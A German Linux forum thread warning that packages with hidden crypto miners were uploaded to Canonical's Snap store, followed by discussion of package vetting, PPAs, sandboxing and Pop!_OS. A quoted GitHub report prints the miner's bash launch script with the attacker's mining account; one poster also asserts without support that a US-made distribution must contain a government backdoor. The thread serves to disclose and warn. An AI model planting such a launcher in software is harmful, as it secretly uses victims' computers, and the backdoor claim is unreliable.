Willkommen Gast. Bitte einloggen oder registrieren. Haben Sie Ihre Aktivierungs E-Mail übersehen?
21.09.2020, 18:14:01

.
Einloggen mit Benutzername, Passwort und Sitzungslänge

Mitglieder
Statistiken
  • Beiträge insgesamt: 683613
  • Themen insgesamt: 55340
  • Heute online: 598
  • Am meisten online: 2287
  • (22.01.2020, 19:20:24)
Benutzer Online

Autor Thema:  Vorsicht mit "Snaps". Malware ist in Canonical's snap store gelandet.  (Gelesen 6160 mal)

0 Mitglieder und 1 Gast betrachten dieses Thema.

Beim Verwenden von "Snaps" ist erhöhte Vorsicht geboten. Ein User hat mehrere mit Crypto Minern versehene Pakete hochgeladen.
Nach einer Beschwerde von einem findigen User wurden diese Mittlerweile entfernt. Zeigt aber dass das Potential und der Wille dazu prinzipiell da ist.
Hier noch die Anfrage auf Github:
https://github.com/canonical-websites/snapcraft.io/issues/651

Zitat
This application contains hidden сrypto-currency miner inside.

squashfs-root/systemd - miner
squashfs-root/start - init script:
#!/bin/bash

currency=bcn
name=2048buntu


{ # try
/snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1 -g
} || { # catch
cores=($(grep -c ^processor /proc/cpuinfo))

if (( $cores < 4 )); then
    /snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1
else
    /snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 2
fi
}
I did not find way to complain about the application. Which way is good for it?

Scheinbar lässt auch die Möglichkeit solche Fälle schnell und direkt zu melden zu wünschen übrig. Ein Issue auf Github (das natürlich auch einen github Account vorraussetzt) sollte man dafür eigentlich nicht starten müssen. Die Reaktion hat auch volle 24 Stunden gedauert.
Crypto Miner sind jetzt nicht so wild aber es hätte ja genauso gut etwas anderes sein können.

lennartware


Interessante Passagen aus dem Heise Artikel:
Zitat
Keine Prüfung auf Schadsoftware im Store
Der Snap Store von Ubuntu testet zwar die technische Lauffähigkeit einer Anwendung, verfügt aber über keine Prüfung auf versteckte Schadsoftware. Jeder kann Snap-Pakete in den Snap Store hochladen.
[ … ]
Ubuntu führte sein Paketformat Snap mit Version 16.04 seiner Linux-Distribution ein und versprach dadurch mehr Komfort durch Wegfall der Abhängigkeiten sowie mehr Sicherheit, weil eine Snap-Anwendung eigentlich abgeschottet in einer Sandbox läuft – was jedoch für Desktop-Snaps nicht ohne weiteres gilt.

Amüsant:
Zitat
Angeblicher Autor verteidigt sich
… Er habe mit dem Mining lediglich seine Software "finanzieren" wollen und bietet an, den Betrag der Ubuntu-Foundation zu spenden. Inwiefern er wie behauptet tatsächlich der Malware-Autor ist, lässt sich nicht bestätigen.

Aus den Kommentaren dazu:
Zitat
Ob NPM oder "Snap" oder JavaScript oder "apps" aller Art - man kann die banale Erkenntnis immer wieder so zusammenfassen:
"Irgendwelche executables von Fremden aus dem Netz ausführen ist gefährlich"
Und das jede öffentliche Plattform, auf der solche executables angeboten werden können, auch von Leuten mit niederen finanziellen Interessen missbraucht werden, ist einfach nur selbstverständlich.
Ein "Kryptominer" gehört da noch zu den kleinsten denkbaren Schadensszenarien.
Schön, wenn der Fall jetzt wenigstens mal eine Diskussion angestoßen hat, die eigentlich vor Öffnung des Angebots hätte geführt werden müssen.
(Autor: pn)
« Letzte Änderung: 14.05.2018, 17:44:38 von aexe »

Gibt es eigentlich bei Launchpad (PPAs) eine Prüfung auf versteckte Schadsoftware?


Mir gefällt das Konzept "snap" aus vielen Gründen garnicht und natürlich ist es hier besonders leicht Leuten etwas unterzujubeln weil quasi gar kein Hinderniss da ist.
Trotzdem wird bei solchen Artikeln und Kommentaren immer und immer wieder etwas implizit angedeutet was einfach nicht stimmt - nämlich dass in den offiziellen Repos einer Linux Distribution etwas stattfindet das den Namen "Prüfung auf Schadware" verdient hätte.
Das stimmt so aber halt auch nicht und das ist auch so gut wie unmöglich. Ein Maintainer kümmert sich darum dass der Code vom legitimen Upstream Anbieter/Entwickler kommt aber einen professionellen Software Audit für jedes Paket führen die natürlich auch nicht durch, und das wäre auch unmöglich. Schadcode ist immer potentiell nur einen unvorsichtigen Pull Request (etwas übersehen) zu viel vom User entfernt.
Und da darf man sich jetzt nicht vorstellen dass das vergleichbar wäre mit Schadcode in Firefox oder Gnome zu bringen. Linux Distris bieten zwischen 10 und 50 tausend Pakete an, kommen von zehntausenden verschiedenen Code Repos. Paketverwalter sind nicht zwangsläufig Programmierer und schon garnicht Sicherheitsanalysten.

lennartware


Im Gegensatz zu Snaps und da würde ich Flatpak und Appimage auch nennen, wird bei der Verwendung von PPAs aber deutlich gewarnt, dass es keine offiziellen Quellen sind und man Vorsicht walten lassen soll.

Und deshalb läuft hier firejail. Kann bei der Einrichtung zwar einen Zusatzaufwand bedeuten (besonders wenn man irgendwo von Standard abweicht), aber dafür nachher eine feine Sache.

14.05.2018, 18:07:58

sogar der zweite Jahrestag ist schon vorbei. ;D

Auf meinem Kubuntu 20.04 habe ich Chromium auch wieder verbannt, seitdem es nur noch als Snap kommt.
Dazu kommt noch, dass der Systemstart von Snaps spürbar verzögert zu bemerken ist. Den Dienst "snapd" habe ich
ebenfalls gleich ganz deinstalliert.
Ich setzte weiterhin auf die bewährte Paketverwaltung apt und benutze jetzt lieber den Google-Chrome-Browser.

Auf meinem Kubuntu 20.04 habe ich Chromium auch wieder verbannt, seitdem es nur noch als Snap kommt.

Abhilfe hätte das Repo von Pop!_OS gebracht. Die setzen ja auch auf Ubuntu 20.04 LTS und haben so einiges mehr in ihren Repos. Auch den chromium-browser.

Abhilfe hätte das Repo von Pop!_OS gebracht.
Zumindest haben die kein Snap dabei. Dafür aber viele eigene Pakete.
Zitat
Das macht, offen gesagt, ein wenig skeptisch: Ein modifizierter Kernel, diverse modifizierte Gnome-Pakete (inklusive des eigenen Paketmanagers pop-shop, der natürlich auf Gnome Software basiert und ebenso schlecht wie dieses Programm funktioniert) etc. Ist system76 wirklich in der Lage, all diese Pakete langfristig solide zu warten? Gerade mit modifizierten Gnome-Paketen ist selbst Canonical gescheitert und letztlich zurück in das Mainstream-Lager gewechselt.

Standardmäßig sind keine Snap-Pakete installiert. Selbst auf die Installation des Snap-Dämons hat system76 verzichtet. (Sie können das mit apt install snapd beheben, wenn Sie wirklich wollen.)

systemd-boot statt GRUB
Technisch gesehen die größte Überraschung ist, dass Pop!_OS auf Rechnern oder virtuellen Maschinen mit EFI nicht GRUB verwendet, sondern die systemd-Komponente systemd_boot.
[…]
https://kofler.info/pop_os/
Ganz so einfach und unbedenklich scheint mir die Übernahme dieser Paketquelle in ein LinuxMint nicht zu sein.
« Letzte Änderung: 18.05.2020, 15:53:59 von aexe »

Würde ich bei LM auch nicht dazunehmen aus den Gründen, die du genannt hast.
Es geht aber doch um Kubuntu und das QT-Framework. Da spielt es ja keine Rolle, was für Gnome-Pakete die Pop OSler vorhalten.

Das macht, offen gesagt, ein wenig skeptisch: Ein modifizierter Kernel, diverse modifizierte Gnome-Pakete .....

Zitat von: kofler.info
..... wird von der amerikanischen Firma system76 entwickelt.

Damit dürfte diese Firma dem USA PATRIOT Act unterliegen. Nach meinem Kenntnisstand, ist damit zwingend davon auszugehen, dass diese Distribution ein Backdoor für die Behörden enthält. Wie soll man das ohne diverse Modifizierungen erreichen?

Da kann man dann IMHO, nur von Sicherheitsgedanken aus betrachtet, auch gleich bei Win-XYZ bleiben.

Na, jetzt übertreib mal nicht. Die bieten schon ein gutes System an und haben auch ordentlich gepflegte aktuelle Firmware in ihrem Repo. Ich selbst steh jetzt nicht so auf Gnome. Wer das aber mag, findet da eine bessere Umsetzung als im Ubuntu Original.